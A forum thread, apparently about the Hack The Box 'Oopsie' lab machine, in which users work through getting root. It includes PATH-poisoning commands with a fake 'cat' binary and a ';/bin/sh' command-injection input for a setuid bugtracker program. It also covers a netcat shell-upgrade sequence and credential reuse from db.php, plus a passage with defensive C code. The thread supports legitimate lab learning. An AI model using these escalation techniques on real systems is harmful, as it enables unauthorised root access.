Oopsie Machine - Starting Point

Hey everyone,
I am stuck at the end of the walk through to get the flag of this Machine... The tutorial at the end gives me these steps:

export PATH=.:$PATH
echo '/bin/sh' > cat
chmod +x ./cat

But every time I run the echo '/bin/sh' > cat, I get bash : cat : permission denied... No matter what I do, I get the same error again and again...
Any little hint or help ? I would appreciate it..
Thanks...


Comments

  • identical problem here.

  • There is also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

  • @DaChef said:

    There is also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

    Thanks @DaChef it was easier than it looked... :smile:
    Got user and Root Flags.. :smiley:

  • @m1l0 said:

    @DaChef said:

    There is also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

    Thanks @DaChef it was easier than it looked... :smile:
    Got user and Root Flags.. :smiley:

    Gj :)

  • edited March 29

    Where to do command injection exactly? Still struggling with this.

  • @BAACS said:

    Where to do command injection exactly? Still struggling with this.

    Just got root! 30 seconds after posting this :smiley: hahahha.

  • edited March 29

    ...

  • I'm struggling to fully understand the shell upgrade code i.e.

    SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xterm

    I get that SHELL sets the user's shell, but it seems to be running "script" and sending the output to null. From googling it seems that script is a kind of command recorder - unclear how this helps! Then I assume the Ctrl-Z is meant to background something (breaks the nc connection for me). stty switches off echoing, ok, not sure how this helps.

    reset and xterm resets the terminal session.

    So I kinda get the individual commands, but can anyone explain how this works as a whole?
    Thanks

  • is anyone else having an issue even getting a result from scans in startpoint....

  • @DaChef said:

    There is also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

    I appreciate your answer bro, may I know what made this code "export PATH=.:$PATH
    echo '/bin/sh' > cat
    chmod +x ./cat" not work in the first place

    Ja4V8s28Ck
    Nothing is an Accident, It's Just a part of Destiny

  • @Ja4V8s28Ck said:

    @DaChef said:

    There is also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

    I appreciate your answer bro, may I know what made this code "export PATH=.:$PATH
    echo '/bin/sh' > cat
    chmod +x ./cat" not work in the first place

    The correct approach on PATH env variable poisoning would be:
    cd /tmp/
    echo "/bin/sh" > cat
    chmod +x cat
    export PATH=/tmp:$PATH

    The dot referencing on your current directory is wrong, you need to specify the exact path!

  • edited April 5

    The correct approach on PATH env variable poisoning would be:
    cd /tmp/
    echo "/bin/sh" > cat
    chmod +x cat
    export PATH=/tmp:$PATH

    @DaChef /tmp or any directory in which your current user has privileges to write.

  • edited April 6

    post removed - posted in wrong thread

  • @phamilton said:

    The correct approach on PATH env variable poisoning would be:
    cd /tmp/
    echo "/bin/sh" > cat
    chmod +x cat
    export PATH=/tmp:$PATH

    @DaChef /tmp or any directory in which your current user has privileges to write.

    This worked for me. Thanks :smiley:

  • Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

  • edited April 16

    Right now bugtracker doesn't have the setuid bit set, so the cat shell just gives you normal permission. Something to check if you are running everything else right and it just doesn't work.

    [email protected]:/tmp$ /usr/bin/bugtracker

    : EV Bug Tracker :

    Provide Bug ID: 1

    $ whoami
    robert
    $ ls -al /usr/bin/bugtracker
    -rwxr-xr-x 1 root root 8792 Apr 16 02:56 /usr/bin/bugtracker

    However bugtracker.save still has the setuid bit so that can work:
    $ ls -al /usr/bin/bugtracker.save
    -rwsr-xr-x 1 root bugtracker 8792 Jan 25 10:14 /usr/bin/bugtracker.save

    $ /usr/bin/bugtracker.save

    : EV Bug Tracker :

    Provide Bug ID: 1

    whoami

    root
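
The two routes to a root shell in this thread (a fake cat placed earlier in PATH, and ;/bin/sh typed at the Bug ID prompt) both need the setuid helper to pass the ID to a shell command; that is an assumption here, since the thread never shows bugtracker's source. As an added example, not code from the machine or the walkthrough, this C version of such a helper validates the ID and reads the report itself, so neither PATH nor shell metacharacters matter. REPORT_DIR and the function names are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L /* for O_NOFOLLOW and ssize_t */
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define REPORT_DIR "/var/lib/bugtracker/reports" /* hypothetical directory */

/* Accept 1-9 decimal digits only: ';', '/', '.', spaces never get through. */
int is_valid_bug_id(const char *id)
{
    size_t n = strlen(id);
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)id[i]))
            return 0;
    return n >= 1 && n <= 9;
}

/* Absolute path for a validated ID, or NULL. Static buffer: single-threaded use. */
const char *report_path(const char *dir, const char *id)
{
    static char path[256];
    int n = is_valid_bug_id(id) ? snprintf(path, sizeof path, "%s/%s", dir, id) : -1;
    return (n < 0 || (size_t)n >= sizeof path) ? NULL : path;
}

/* Copy the report to stdout with open()/read(): no shell, no PATH lookup. */
int print_report(const char *dir, const char *id)
{
    char buf[4096];
    ssize_t r;
    const char *path = report_path(dir, id);
    int fd = path ? open(path, O_RDONLY | O_NOFOLLOW) : -1;
    if (fd < 0)
        return -1;
    while ((r = read(fd, buf, sizeof buf)) > 0)
        if (write(STDOUT_FILENO, buf, (size_t)r) != r)
            break; /* short write is treated as an error below */
    close(fd);
    return r == 0 ? 0 : -1;
}

int main(void)
{
    char id[32] = "";
    if (fgets(id, sizeof id, stdin))
        id[strcspn(id, "\n")] = '\0';
    return print_report(REPORT_DIR, id) == 0 ? 0 : 1;
}
```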

  • edited April 20

    I am able to do that but when I do cat /root/root.txt nothing happens

    Never mind found it

  • edited April 23

    @NeoCortex2000 said:
    Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

    I had the same problem and was fooled by the fact that r̶u̶n̶n̶i̶n̶g̶ misusing locate wasn't turning anything up. You'll find what you need if you keep looking.

    stevebytheway

  • @stevebytheway said:

    @NeoCortex2000 said:
    Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

    I had the same problem and was fooled by the fact that running locate wasn't turning anything up. You'll find what you need if you keep looking.

    Hey Steve yes I found it with the linux find command in the end: find / -name *.txt

  • I am in netcat and logged in as www-data
    [email protected]:
    When I try to sudo robert I'm getting sorry try again?
    I am using the password from the db.php file.
    Am I missing something?

  • @ritorix How did you get into the robert user account? When I attempt su robert and enter the password from the db.php file, it gives me "su: Authentication failure"

  • Looks like someone may have changed the password? I tried the same process today and it worked!

  • @kp22cfc said:

    I am able to do that but when I do cat /root/root.txt nothing happens

    Never mind found it

    how did you manage?? I can't seem to be able to cat?!

  • @Jade86 said:
    @kp22cfc said:

    I am able to do that but when I do cat /root/root.txt nothing happens

    Never mind found it

    how did you manage?? I can't seem to be able to cat?!

    ah ok. got it, sorry lol

  • OK. Noob here. I got all the way to the end and it looks like I did everything right. I run /usr/bin/bugtracker and get the correct output but I still don't have access to anything. i.e. /root. I've gone through the walkthrough many times for over 16 hours and I get the same result. Any advice?

  • Hi guys, need help.. script below is not working for me.

    SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xterm

    this is what is happening
    [email protected]:/$ SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xtermSHELL=/bin/bash script -q /dev/null
    [email protected]:/$ Ctrl-Z
    Ctrl-Z: command not found
    [email protected]:/$ stty raw -echo
    [email protected]:/$ bash: fg: current: no such job
    [email protected]:/$ reset: unknown terminal type unknown
    Terminal type?

    help me understand what is happening here?

  • Someone helped me understand that Ctrl-Z is to send the nc connection to the background without killing it (this is where I was getting confused). Then the "fg" command brings it forward ..

    Hope this helps users like me.. :smile:

    @deeptestpilot said:

    Hi guys, need help.. script below is not working for me.

    SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xterm

    this is what is happening
    [email protected]:/$ SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xtermSHELL=/bin/bash script -q /dev/null
    [email protected]:/$ Ctrl-Z
    Ctrl-Z: command not found
    [email protected]:/$ stty raw -echo
    [email protected]:/$ bash: fg: current: no such job
    [email protected]:/$ reset: unknown terminal type unknown
    Terminal type?

    help me understand what is happening here?

  • Did you find how to solve Terminal type? I'm stuck at that point

    @deeptestpilot said:

    Someone helped me understand that Ctrl-Z is to send the nc connection to the background without killing it (this is where I was getting confused). Then the "fg" command brings it forward ..

    Hope this helps users like me.. :smile:

    @deeptestpilot said:

    Hi guys, need help.. script below is not working for me.

    SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xterm

    this is what is happening
    [email protected]:/$ SHELL=/bin/bash script -q /dev/null
    Ctrl-Z
    stty raw -echo
    fg
    reset
    xtermSHELL=/bin/bash script -q /dev/null
    [email protected]:/$ Ctrl-Z
    Ctrl-Z: command not found
    [email protected]:/$ stty raw -echo
    [email protected]:/$ bash: fg: current: no such job
    [email protected]:/$ reset: unknown terminal type unknown
    Terminal type?

    help me understand what is happening here?

  • @deeptestpilot said:

    Hi guys, need help.. script below is not working for me.

    this is what is happening
    [email protected]:/$ SHELL=/bin/bash script -q /dev/null
    Ctrl-Z

    Don't copy and paste the block of code provided. After the SHELL command don't type "Ctrl-Z". Press the Ctrl and Z keypad buttons at the same time. This will throw you back to your attacker machine and put the shell in the background. So you should have your vm's command line.

    Then type the stty command. Enter.
    Then type "fg" which will bring your shell cli back up. In the shell cli type "reset" and you will be asked what type of terminal to open. Type "xterm". Voilà! I ran into this also
